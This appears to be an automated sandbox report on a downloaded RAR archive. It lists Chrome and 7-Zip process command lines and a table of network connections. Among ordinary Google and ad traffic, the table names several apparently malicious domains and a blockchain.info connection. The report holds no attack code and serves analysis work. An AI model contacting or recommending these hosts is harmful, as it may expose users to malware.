"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3396 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4852 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3616 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3696 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4888 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=2432 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=1548 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=3300 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4652 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=2928 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5232 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=4908 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4664 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6072 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=3268 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6500 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=6656 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6816 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=6780 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7028 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=6432 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=2928 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6192 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6076 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7288 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7552 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7680 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7964 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=7700 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=8104 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=7888 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=6208 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=8212 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=8548 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=8532 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=8032 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004C8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=9104 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=8996 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=8876 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=9384 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=8616 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=9672 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=7876 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=3376 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=7984 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=7580 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=7640 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=7648 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9420 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=7728 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=8608 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=9324 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=9128 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=7616 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=7620 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=7612 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=7300 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7496 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=928 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=9924 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=8184 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=6024 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9368 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8400 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\irizari8.rar"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 172.67.153.234:80 | aprel88.com | tcp |
| US | 172.67.153.234:443 | aprel88.com | tcp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 172.67.151.174:80 | death1488.com | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 104.21.32.201:80 | good2-led.com | tcp |
| US | 104.21.32.201:443 | good2-led.com | tcp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| GB | 2.18.66.74:443 | tcp | |
| GB | 2.18.66.74:443 | tcp | |
| US | 20.189.173.6:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 188.114.96.2:443 | ezidygd.com | tcp |
| GB | 92.123.128.176:443 | r.bing.com | tcp |
| GB | 92.123.128.176:443 | r.bing.com | tcp |
| GB | 92.123.128.176:443 | r.bing.com | tcp |
| GB | 92.123.128.176:443 | r.bing.com | tcp |
| GB | 92.123.128.176:443 | r.bing.com | tcp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| US | 188.114.97.2:80 | ezidygd.com | tcp |
| US | 188.114.97.2:443 | ezidygd.com | tcp |
| US | 104.21.91.173:443 | 1blob.monster | tcp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| GB | 92.123.128.176:443 | r.bing.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 205.234.175.175:443 | jspm.dev | tcp |
| US | 104.17.140.37:443 | blockchain.info | tcp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| US | 104.21.9.32:443 | dark-confusion.com | tcp |
| US | 104.21.9.32:443 | dark-confusion.com | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 104.26.8.210:443 | i2.modland.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.178.14:443 | consent.google.com | tcp |
| GB | 216.58.213.14:443 | apis.google.com | tcp |
| GB | 142.250.187.206:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.187.206:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.187.206:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.187.206:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.187.206:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.187.206:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | udp |
| US | 104.26.8.210:443 | i2.modland.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | tcp |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 216.239.32.3:443 | csi.gstatic.com | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| FR | 178.250.7.4:443 | ads.eu.criteo.com | tcp |
| FR | 178.250.7.4:443 | ads.eu.criteo.com | tcp |
| FR | 178.250.7.2:443 | static.criteo.net | tcp |
| FR | 178.250.7.2:443 | static.criteo.net | tcp |
| FR | 178.250.7.12:443 | rtb.fr3.eu.criteo.com | tcp |
| FR | 178.250.7.9:443 | cat.fr3.eu.criteo.com | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| FR | 178.250.7.17:443 | csm.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | 17.7.250.178.in-addr.arpa | udp |
| FR | 178.250.7.2:443 | static.criteo.net | tcp |
